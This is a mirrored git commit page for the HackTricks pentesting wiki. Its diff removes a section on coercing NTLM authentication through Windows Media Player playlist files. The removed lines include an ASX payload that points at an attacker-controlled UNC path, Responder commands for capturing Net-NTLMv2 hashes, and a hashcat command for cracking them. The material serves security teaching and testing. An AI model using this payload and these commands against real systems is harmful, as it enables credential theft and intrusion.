mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
Update phishing-documents.md
This commit is contained in:
parent
cb51b0dcf8
commit
9a95bc80a3
@ -160,38 +160,6 @@ There are several ways to **force NTLM authentication "remotely"**, for example,
|
|||||||
../../windows-hardening/ntlm/places-to-steal-ntlm-creds.md
|
../../windows-hardening/ntlm/places-to-steal-ntlm-creds.md
|
||||||
{{#endref}}
|
{{#endref}}
|
||||||
|
|
||||||
### Windows Media Player playlists (.ASX/.WAX) to coerce NTLM
|
|
||||||
|
|
||||||
If a workflow automatically previews media (e.g., HR reviewing uploads) using Windows Media Player, you can leak Net-NTLMv2 by providing a playlist that references a UNC path. When WMP loads the entry, it attempts SMB access with implicit NTLM authentication.
|
|
||||||
|
|
||||||
Example ASX payload (also supported by .WAX):
|
|
||||||
|
|
||||||
```xml
|
|
||||||
<asx version="3.0">
|
|
||||||
<title>Leak</title>
|
|
||||||
<entry>
|
|
||||||
<title></title>
|
|
||||||
<ref href="file://10.10.14.148\test\pwn.mp3" />
|
|
||||||
</entry>
|
|
||||||
</asx>
|
|
||||||
```
|
|
||||||
|
|
||||||
Collect and crack the hash:
|
|
||||||
|
|
||||||
```bash
|
|
||||||
# Capture Net-NTLMv2
|
|
||||||
sudo Responder -I <iface>
|
|
||||||
# Or run via uv if you manage dependencies with it
|
|
||||||
# sudo uv run --script Responder.py -I <iface>
|
|
||||||
|
|
||||||
# Crack (hashcat auto-detects NetNTLMv2, mode 5600)
|
|
||||||
hashcat ntlm.hash /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt
|
|
||||||
```
|
|
||||||
|
|
||||||
Notes
|
|
||||||
- Use ntlm_theft to generate ready-made WMP coercion files: https://github.com/Greenwolf/ntlm_theft
|
|
||||||
- If NTLM signing/SMB egress is blocked or NTLM disabled, this won’t work. Otherwise, it’s effective when targets auto-open or preview uploaded playlists.
|
|
||||||
|
|
||||||
### NTLM Relay
|
### NTLM Relay
|
||||||
|
|
||||||
Don't forget that you cannot only steal the hash or the authentication but also **perform NTLM relay attacks**:
|
Don't forget that you cannot only steal the hash or the authentication but also **perform NTLM relay attacks**:
|
||||||
|
Loading…
x
Reference in New Issue
Block a user